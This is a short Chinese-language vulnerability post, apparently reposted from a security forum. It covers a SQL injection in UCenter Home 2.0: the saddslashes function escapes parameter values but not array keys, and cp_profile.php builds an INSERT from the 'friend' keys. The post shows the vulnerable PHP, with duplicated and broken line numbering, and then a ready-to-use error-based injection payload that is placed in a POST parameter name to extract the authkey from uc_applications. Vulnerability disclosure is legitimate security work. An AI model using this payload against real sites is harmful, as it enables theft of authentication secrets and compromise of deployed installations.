uc_home 2.0 在magic_quote_gpc off 的环境下只对参数值进行过滤,忽略了参数名
function_common.php
02 |
function saddslashes( $string ) { |
03 |
if ( is_array ( $string )) { |
04 |
foreach ( $string as $key => $val ) { |
05 |
$string [ $key ] = saddslashes( $val ); |
08 |
$string = addslashes ( $string ); |
02 |
function saddslashes( $string ) { |
03 |
if ( is_array ( $string )) { |
04 |
foreach ( $string as $key => $val ) { |
05 |
$string [ $key ] = saddslashes( $val ); |
08 |
$string = addslashes ( $string ); |
cp_profile.php 大约56行
03 |
foreach ( $_POST [ 'friend' ] as $key => $value ) { |
04 |
$value = intval ( $value ); |
05 |
$inserts [] = "('base','$key','$space[uid]','$value')" ; |
08 |
$_SGLOBAL [ 'db' ]->query( "DELETE FROM " .tname( 'spaceinfo' ). " WHERE uid='$space[uid]' AND type='base'" ); |
09 |
$_SGLOBAL [ 'db' ]->query( "INSERT INTO " .tname( 'spaceinfo' )." (type,subtype,uid,friend) |
10 |
VALUES ".implode( ',' , $inserts )); |
Exploit:
要求: magic_quote_gpc off
URL: cp.php?ac=profile&op=base
保存时创建一个POST,参数名为:
friend[a’,(select 1 from(select count(*),concat((Select concat(substring(authkey,1,64)) FROM uc_applications limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a),’1′)#]
参数值: 随意
http://t00ls.net/thread-14523-1-1.html
0 条评论。